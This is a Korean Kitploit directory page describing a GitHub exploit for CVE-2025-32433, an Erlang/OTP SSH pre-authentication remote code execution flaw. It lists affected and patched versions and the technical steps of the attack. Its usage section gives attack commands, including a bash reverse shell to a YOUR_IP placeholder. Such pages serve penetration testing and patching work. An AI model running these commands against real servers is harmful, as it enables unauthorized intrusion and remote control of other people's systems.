Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32433-Exploit-edited — Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility | Kitploit
도구/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingRemote Access Tool
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
2개월 전아직 검토되지 않음

CVE-2025-32433 Exploit (Windows 호환)

Erlang/OTP SSH 인증되지 않은 원격 코드 실행

설명

이 저장소는 Erlang/OTP SSH 서버의 심각한 인증되지 않은 원격 코드 실행 취약점인 CVE-2025-32433에 대한 익스플로잇을 포함합니다.

주요 기능:

  • ✅ 인증 전 RCE 익스플로잇
  • ✅ Windows GBK 인코딩 호환성 수정
  • ✅ Erlang/OTP 버전 ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19에서 작동

취약점 상세 정보

CVE ID: CVE-2025-32433
심각도: 치명적
영향: 인증되지 않은 원격 코드 실행

이 취약점은 공격자가 특수하게 조작된 SSH 프로토콜 메시지를 전송하여 인증 없이 Erlang/OTP SSH 서버에서 임의의 시스템 명령을 실행할 수 있도록 합니다.

영향받는 버전

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)

사용법

root@kitploit:~
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

인수

root@kitploit:~
-t, --target    Target IP address (default: 127.0.0.1)
-p, --port      Target port (default: 2222)
-c, --command   System command to execute
-e, --erlang    Raw Erlang code to execute

Windows 인코딩 수정

이 버전은 원래 익스플로잇에 존재하는 인코딩 문제를 수정합니다.

문제: 원래 익스플로잇은 유니코드 체크마크 문자(✓, U+2713)를 사용하여 Windows에서 GBK 인코딩 오류를 발생시킵니다:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

해결책: 교차 플랫폼 호환성을 위해 유니코드 문자를 표준 ASCII + 문자로 대체했습니다.

기술적 세부 사항

익스플로잇은 다음과 같이 작동합니다:

  1. SSH 연결 및 배너 교환 설정
  2. SSH_MSG_KEXINIT 패킷 전송
  3. SSH_MSG_CHANNEL_OPEN으로 SSH 채널 열기
  4. 인증 전에 악성 exec 명령어가 포함된 SSH_MSG_CHANNEL_REQUEST 전송
  5. os:cmd()를 통해 임의의 Erlang 코드 실행

참고 자료

  • GitHub 보안 권고
  • Erlang/OTP 커밋 수정
  • RFC 4254 - SSH 연결 프로토콜
  • ProDefense CVE-2025-32433

패치된 버전

root@kitploit:~
- OTP 27.3.3
- OTP 26.2.5.11
- OTP 25.3.2.20

면책 조항

이 익스플로잇은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 책임감 있게 사용하고 명시적 허가를 받은 시스템에서만 테스트하십시오.

라이선스

MIT 라이선스

저자

chuzouX가 Windows 호환성을 위해 수정함

도구 다운로드